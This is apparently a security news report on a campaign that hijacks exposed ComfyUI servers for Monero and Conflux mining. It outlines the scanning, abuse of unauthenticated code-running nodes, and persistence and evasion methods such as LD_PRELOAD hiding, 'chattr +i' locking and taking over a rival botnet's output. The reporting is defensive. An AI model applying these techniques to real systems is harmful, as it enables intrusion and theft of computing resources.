An aggressive campaign has been identified aiming at internet-exposed platforms running ComfyUI, a notable stable diffusion tool, to conscript them into a cryptomining and proxy botnet. This activity is primarily orchestrated using a specifically designed Python scanner that scans major cloud IP ranges for susceptible targets. Once identified, malicious nodes are deployed through ComfyUI-Manager if no existing vulnerable node is present, according to a report by Censys security researcher Mark Ellzey.
Mechanics of the Cryptomining Operation
The campaign systematically identifies and exploits misconfigured ComfyUI instances that permit remote code execution without authentication. Once compromised, the hosts become part of a cryptomining network mining Monero via XMRig and Conflux using lolMiner. These operations are centrally administered via a Flask-based command-and-control dashboard. Despite the relatively small number of over 1,000 publicly accessible ComfyUI instances, the attacker leverages these for financial gain through opportunistic campaigns.
Tools and Exploitation Techniques
Censys uncovered the campaign after finding an open directory linked to the Aeza Group, known for bulletproof hosting services. This directory housed tools used for reconnaissance and exploitation, including scripts to locate and exploit ComfyUI instances. The scripts exploit ComfyUI’s custom nodes that execute raw Python code without authentication, allowing attackers to deliver malicious payloads efficiently.
Persistence and Competitive Targeting
To maintain persistence, the attackers deploy mechanisms that download a shell script every six hours and re-execute exploits upon ComfyUI startup. The script disables shell history, eliminates competing miners, and uses the LD_PRELOAD hook to conceal a watchdog process. Additionally, the malware protects its binaries with the ‘chattr +i’ command to prevent their deletion or modification. Notably, the campaign targets a rival botnet, ‘Hisana’, by redirecting its mining output to the attacker’s wallet and occupying its command port.
Further analysis revealed an SSH attempt to another IP associated with a worm campaign on vulnerable Redis servers, indicating a broader attack strategy. Despite initial appearances of unsophistication, the campaign’s tactics suggest a deliberate approach to exploit exposed services for persistent and monetizable infections.
Broader Context of Botnet Campaigns
The discovery aligns with other botnet campaigns exploiting various vulnerabilities across platforms like n8n, Tenda routers, and Apache ActiveMQ to install malware for cryptomining and DDoS attacks. Researchers have observed a significant increase in botnet activity, partly due to the availability of source code for botnets like Mirai, facilitating widespread attacks.
As botnet campaigns continue to proliferate, the cybersecurity landscape faces ongoing challenges in protecting exposed services from exploitation. Continuous monitoring and updating of security protocols remain essential in mitigating such threats.
